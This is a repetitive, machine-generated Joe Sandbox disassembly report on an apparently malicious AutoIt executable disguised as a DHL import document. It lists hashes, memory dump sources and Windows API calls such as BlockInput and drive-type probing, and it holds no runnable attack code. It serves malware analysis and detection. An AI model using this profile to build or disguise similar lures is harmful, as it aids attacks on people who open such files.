                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: c70616610653456740802fdc9b7857ec40c6040c7653e044cfea638ad4350836
                                                                                          • Instruction ID: e87f0aaa439b0d12b62f374301cd7b70bcc7f75409378d298b5d8fa414921166
                                                                                          • Opcode Fuzzy Hash: c70616610653456740802fdc9b7857ec40c6040c7653e044cfea638ad4350836
                                                                                          • Instruction Fuzzy Hash: 27B13B316106099FD755CF28C88AB657BE0FF45368F29C658E899CF2E2D335E9A1CB40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: 82e57052542eadd7fe5adb1bae70d644f91411bbf06b4dfde7e797f4ea329315
                                                                                          • Instruction ID: 14cae6deb2dc8f68ea6036cc8619ea70a54fd6e81502a34f6aacd3fcdb3e283c
                                                                                          • Opcode Fuzzy Hash: 82e57052542eadd7fe5adb1bae70d644f91411bbf06b4dfde7e797f4ea329315
                                                                                          • Instruction Fuzzy Hash: 29126E71901269DBCF24CF59D8816EEBBF5FF48710F14819AE809EB255EB349A81CF90
                                                                                          APIs
                                                                                          • BlockInput.USER32(00000001), ref: 0084EABD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlockInput
                                                                                          • String ID:
                                                                                          • API String ID: 3456056419-0
                                                                                          • Opcode ID: 116f14271b18832bace35559691867f0414554a3b5d9f305b3a1f02ac80dfc7b
                                                                                          • Instruction ID: 9b2879cdb45a16cd0ca813b629fa0479ee30a809932c4a420e6ea44c022fa384
                                                                                          • Opcode Fuzzy Hash: 116f14271b18832bace35559691867f0414554a3b5d9f305b3a1f02ac80dfc7b
                                                                                          • Instruction Fuzzy Hash: C0E012312002159FC710DF59D404D9AB7E9FF68760F018416FD45C7351D674A8408B90
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007F03EE), ref: 007F09DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: b552addf20330cf8d42d68819f339229e21053600cc1c4a6446b85ee5f1886ea
                                                                                          • Instruction ID: c8e7264fe397d75236044329f21401e49a225a62a07a965625f43262a32f7b1b
                                                                                          • Opcode Fuzzy Hash: b552addf20330cf8d42d68819f339229e21053600cc1c4a6446b85ee5f1886ea
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                          • Instruction ID: 122144c297cb885f0e1e231926b7ef8ba5ccda8bf41e41a4a5bf2c2f5b9a2280
                                                                                          • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                          • Instruction Fuzzy Hash: 4C51797160C70D9BDB3C8A6C889E7BE67D99B12380F184509DB82DB382C65DEE42D352
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c77dcd0aee6d30ef000f0c2b05d089f6bbe2bccc2f4015dded1dfd7646a1331
                                                                                          • Instruction ID: 7e735532dd6a9a9620477141ba706c97cc0ec39d65d84f0a56783ca79cbac4cc
                                                                                          • Opcode Fuzzy Hash: 4c77dcd0aee6d30ef000f0c2b05d089f6bbe2bccc2f4015dded1dfd7646a1331
                                                                                          • Instruction Fuzzy Hash: 84320022D29F014DD7639634CC26325A649FFB73C5F15D737E82AB5AAAEB29D4C34100
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff95460d200379b997138f195a66718bd21c3f5aad7260acb0aeb3a012db5600
                                                                                          • Instruction ID: c73742dbbe2416926d0311453baa5b49bb1958763a20496a31db550798b2578d
                                                                                          • Opcode Fuzzy Hash: ff95460d200379b997138f195a66718bd21c3f5aad7260acb0aeb3a012db5600
                                                                                          • Instruction Fuzzy Hash: DA322775A001B98BCF25CF29E490A7D7BA1FB49314F38816AE44ADB2A1D334DDC2DB51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f92afb3615c6a87fd0b7e8062d61bfa779650b0643f391a0276e5a03a58c8471
                                                                                          • Instruction ID: 9f6914850b26696d2134dd828959ff868aefe43f283a71b20f4348b491a7f1fe
                                                                                          • Opcode Fuzzy Hash: f92afb3615c6a87fd0b7e8062d61bfa779650b0643f391a0276e5a03a58c8471
                                                                                          • Instruction Fuzzy Hash: 6B229FB0A00609DFDF14DF64D885AEEB7B6FF84304F14462AE816E7391E73AA951CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(00000000), ref: 00852B30
                                                                                          • DeleteObject.GDI32(00000000), ref: 00852B43
                                                                                          • DestroyWindow.USER32 ref: 00852B52
                                                                                          • GetDesktopWindow.USER32 ref: 00852B6D
                                                                                          • GetWindowRect.USER32(00000000), ref: 00852B74
                                                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00852CA3
                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00852CB1
                                                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852CF8
                                                                                          • GetClientRect.USER32(00000000,?), ref: 00852D04
                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00852D40
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D62
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D75
                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D80
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00852D89
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D98
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00852DA1
                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852DA8
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00852DB3
                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852DC5
                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0086FC38,00000000), ref: 00852DDB
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00852DEB
                                                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00852E11
                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00852E30
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852E52
                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085303F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                          • API String ID: 2211948467-2373415609
                                                                                          • Opcode ID: 978bc3edb4a9f9298350cb1e2fdbaaf8aac9a8aecfc32ed43b7e228389254e9f
                                                                                          • Instruction ID: ae56c2a66f0be0d359cbe74050d8992accedaaa279fa380d19479e99d6375102
                                                                                          • Opcode Fuzzy Hash: 978bc3edb4a9f9298350cb1e2fdbaaf8aac9a8aecfc32ed43b7e228389254e9f
                                                                                          • Instruction Fuzzy Hash: 01027871A00209EFDB14DFA4DC89EAE7BB9FB49311F018159F915EB2A1DB74AD04CB60
                                                                                          APIs
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0086712F
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00867160
                                                                                          • GetSysColor.USER32(0000000F), ref: 0086716C
                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00867186
                                                                                          • SelectObject.GDI32(?,?), ref: 00867195
                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 008671C0
                                                                                          • GetSysColor.USER32(00000010), ref: 008671C8
                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 008671CF
                                                                                          • FrameRect.USER32(?,?,00000000), ref: 008671DE
                                                                                          • DeleteObject.GDI32(00000000), ref: 008671E5
                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00867230
                                                                                          • FillRect.USER32(?,?,?), ref: 00867262
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00867284
                                                                                            • Part of subcall function 008673E8: GetSysColor.USER32(00000012), ref: 00867421
                                                                                            • Part of subcall function 008673E8: SetTextColor.GDI32(?,?), ref: 00867425
                                                                                            • Part of subcall function 008673E8: GetSysColorBrush.USER32(0000000F), ref: 0086743B
                                                                                            • Part of subcall function 008673E8: GetSysColor.USER32(0000000F), ref: 00867446
                                                                                            • Part of subcall function 008673E8: GetSysColor.USER32(00000011), ref: 00867463
                                                                                            • Part of subcall function 008673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00867471
                                                                                            • Part of subcall function 008673E8: SelectObject.GDI32(?,00000000), ref: 00867482
                                                                                            • Part of subcall function 008673E8: SetBkColor.GDI32(?,00000000), ref: 0086748B
                                                                                            • Part of subcall function 008673E8: SelectObject.GDI32(?,?), ref: 00867498
                                                                                            • Part of subcall function 008673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008674B7
                                                                                            • Part of subcall function 008673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008674CE
                                                                                            • Part of subcall function 008673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008674DB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                          • String ID:
                                                                                          • API String ID: 4124339563-0
                                                                                          • Opcode ID: 171e8d0906b2858c61443f08c4e3067d40b73cd43056dc58abe7f6f4a7bf2fc1
                                                                                          • Instruction ID: 6ad0e1f72cdd5f1886f730659112e9c6c54fdf6afc3e0089febf4f8e43a507bf
                                                                                          • Opcode Fuzzy Hash: 171e8d0906b2858c61443f08c4e3067d40b73cd43056dc58abe7f6f4a7bf2fc1
                                                                                          • Instruction Fuzzy Hash: 2FA1B172008301EFDB019F60DC49E6B7BA9FF49324F111A19FAA2D61E1D7B5E944CB92
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,?), ref: 007E8E14
                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00826AC5
                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00826AFE
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00826F43
                                                                                            • Part of subcall function 007E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007E8BE8,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8FC5
                                                                                          • SendMessageW.USER32(?,00001053), ref: 00826F7F
                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00826F96
                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00826FAC
                                                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00826FB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                          • String ID: 0
                                                                                          • API String ID: 2760611726-4108050209
                                                                                          • Opcode ID: 90dd9e3b137c36f0eac4acb1bb0b492bcc47baa1312d8d7dbee05dfd9bd5138f
                                                                                          • Instruction ID: a401b76d3064870bfb01b9ad9598859e5c03767a4dc918ef5cd891eee863cb23
                                                                                          • Opcode Fuzzy Hash: 90dd9e3b137c36f0eac4acb1bb0b492bcc47baa1312d8d7dbee05dfd9bd5138f
                                                                                          • Instruction Fuzzy Hash: E712DE34201261DFDB25DF24E848BA6BBE1FF49310F584069F489CB661DB35ECA1CB92
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(00000000), ref: 0085273E
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0085286A
                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008528A9
                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008528B9
                                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00852900
                                                                                          • GetClientRect.USER32(00000000,?), ref: 0085290C
                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00852955
                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00852964
                                                                                          • GetStockObject.GDI32(00000011), ref: 00852974
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00852978
                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00852988
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00852991
                                                                                          • DeleteDC.GDI32(00000000), ref: 0085299A
                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008529C6
                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 008529DD
                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00852A1D
                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00852A31
                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00852A42
                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00852A77
                                                                                          • GetStockObject.GDI32(00000011), ref: 00852A82
                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00852A8D
                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00852A97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                          • API String ID: 2910397461-517079104
                                                                                          • Opcode ID: 366a31ed82b9eb89c506611523469fbc521b3d1202b2573fc7e747e92d0a9efe
                                                                                          • Instruction ID: a26443f3b851865ebabd85bd1657551a53ba2912501395053a27ba3441789f49
                                                                                          • Opcode Fuzzy Hash: 366a31ed82b9eb89c506611523469fbc521b3d1202b2573fc7e747e92d0a9efe
                                                                                          • Instruction Fuzzy Hash: D3B14B71A00219AFEB14DFA8DC49FAE7BB9FB09711F018115F915E7690DBB4AD40CBA0
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00844AED
                                                                                          • GetDriveTypeW.KERNEL32(?,0086CB68,?,\\.\,0086CC08), ref: 00844BCA
                                                                                          • SetErrorMode.KERNEL32(00000000,0086CB68,?,\\.\,0086CC08), ref: 00844D36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$DriveType
                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                          • API String ID: 2907320926-4222207086
                                                                                          • Opcode ID: 10d2807d2ff3dc7f492645edf0f75ffcb74b0f54b0869cff30a1ff9dd8c6e9cb
                                                                                          • Instruction ID: 19392841a8517a64945fab353e8c5123469cba3d6bdbaf89b2d0c028c4d9688f
                                                                                          • Opcode Fuzzy Hash: 10d2807d2ff3dc7f492645edf0f75ffcb74b0f54b0869cff30a1ff9dd8c6e9cb
                                                                                          • Instruction Fuzzy Hash: 1B619F3060520DDBCF04EB64CAC6A68B7B0FB44349B285016F816EB791EB3ADD51DB91
                                                                                          APIs
                                                                                          • GetSysColor.USER32(00000012), ref: 00867421
                                                                                          • SetTextColor.GDI32(?,?), ref: 00867425
                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0086743B
                                                                                          • GetSysColor.USER32(0000000F), ref: 00867446
                                                                                          • CreateSolidBrush.GDI32(?), ref: 0086744B
                                                                                          • GetSysColor.USER32(00000011), ref: 00867463
                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00867471
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00867482
                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0086748B
                                                                                          • SelectObject.GDI32(?,?), ref: 00867498
                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 008674B7
                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008674CE
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 008674DB
                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0086752A
                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00867554
                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00867572
                                                                                          • DrawFocusRect.USER32(?,?), ref: 0086757D
                                                                                          • GetSysColor.USER32(00000011), ref: 0086758E
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00867596
                                                                                          • DrawTextW.USER32(?,008670F5,000000FF,?,00000000), ref: 008675A8
                                                                                          • SelectObject.GDI32(?,?), ref: 008675BF
                                                                                          • DeleteObject.GDI32(?), ref: 008675CA
                                                                                          • SelectObject.GDI32(?,?), ref: 008675D0
                                                                                          • DeleteObject.GDI32(?), ref: 008675D5
                                                                                          • SetTextColor.GDI32(?,?), ref: 008675DB
                                                                                          • SetBkColor.GDI32(?,?), ref: 008675E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
